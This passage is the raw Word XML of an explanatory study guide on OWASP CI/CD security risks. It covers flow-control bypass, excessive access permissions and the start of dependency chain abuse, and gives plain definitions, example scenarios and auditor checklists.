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7768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1. CICD-SEC-1 — Insufficient Flow Control Mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7647D062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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C122654" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pipeline does not properly control the flow from code → build → production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F553F8E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>There should be rules such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2473F8AA" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Developer commits → code review → tests pass → security checks pass → approval → production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10174F94" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">If someone can </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>skip or bypass these steps</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>, you have insufficient flow control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69548E9F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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF049E4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Suppose your production pipeline normally requires:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4FB1C0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Developer creates PR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186311C2" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BACEE75" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Code review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2444D413" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F88A102" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Tests pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795CE33" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091459C4" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Manager approval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC46282" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">       ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503F8CE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Production deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446CE01C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>But a developer discovers that they can directly click:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDE73E1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Deploy to Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3410532F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>without PR approval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715400BF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">That's </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CICD-SEC-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAD94F3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 xml:space="preserve">What you check as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/auditor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243807F8" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149678D5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can someone bypass PR approval? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA63EA5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can someone deploy directly to production? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE33C7" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Can failed tests be ignored? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5529B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can security gates be skipped? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEBAB6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are production deployments manually approved? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DD86A6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can developers modify the deployment flow? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A83606C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are branch protection rules enforced? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17126F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Strong example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B0831" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>A developer pushes malicious code to main.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E5E770" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Normally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EC90E6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>PR → 2 approvals → tests → security validation → production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F9FE6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>But they find a "Deploy Now" option that skips approvals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925F3F3" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> Malicious/untested code reaches production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700C905C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="791D4022">
          <v:rect id="_x0000_i1085" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B0685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2. CICD-SEC-2 — Inadequate Identity and Access Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B05E1C7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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB35161" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The wrong people have access to the CI/CD system or have more permissions than they need.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945D805" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>This is basically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477D133B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Who are you, and what are you allowed to do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245788FD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Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F217C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Imagine Jenkins has these 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113"/>
        <w:gridCol w:w="2376"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="6A5E0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46824" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A54CB6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3BBFB9B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs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7DB02A91" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A54CB6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Actually has</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="3840E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A7B9" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Developer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A53893" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Build/test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E784D7A" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="0EB10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F309" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD5608F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Test pipelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63E621F1" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Production deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w14:paraId="24CAC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A901" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AFF62BA" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Approve deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="127B71D5" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
            <w:r w:rsidRPr="00A54CB6">
              <w:t>Full Jenkins admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11407EED" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>That's a problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725216F9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What you check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5248363B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Is MFA enabled? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3755654D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are individual accounts used? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C1C14" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are shared accounts used? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E14B0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are inactive users removed? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C9394" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are permissions based on roles? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856877B" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can developers access production? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98571F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Can normal users administer Jenkins/GitLab? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11530726" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are service accounts properly restricted? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945E9D6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">Are privileged accounts limited? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2896F3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Strong example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1233CAD0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>A developer only needs to run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F83B91" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Build → Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391217BF" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>But their account can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625CDB6" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Create pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735171FE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Modify credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F03EE" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Deploy to production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07966F3F" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Delete jobs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313676B0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Create administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11741DA0" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">That's excessive privilege under </w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA134E1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Easy way to remember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79766697" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEC-2 = Who can access the CI/CD platform?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4A9A4D" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:pict w14:anchorId="72324658">
          <v:rect id="_x0000_i1086" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0E6819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3. CICD-SEC-3 — Dependency Chain Abuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC3EAF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Simple meaning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD6A81" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Your pipeline trusts external dependencies/packages, and an attacker manages to get malicious code into one of those dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ABDA23" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:lastRenderedPageBreak/>
        <w:t>Think:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC538C" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t>Your application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497DEBBD" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve">      ↓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC98F3E" w14:textId="77777777" w:rsidR="00A54CB6" w:rsidRPr="00A54CB6" w:rsidRDefault="00A54CB6" w:rsidP="00A54CB6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> package / Maven dependency / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t>PyPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54CB6">
        <w:t xml:space="preserve"> package</w:t>
      </w:r>
    </w:p>
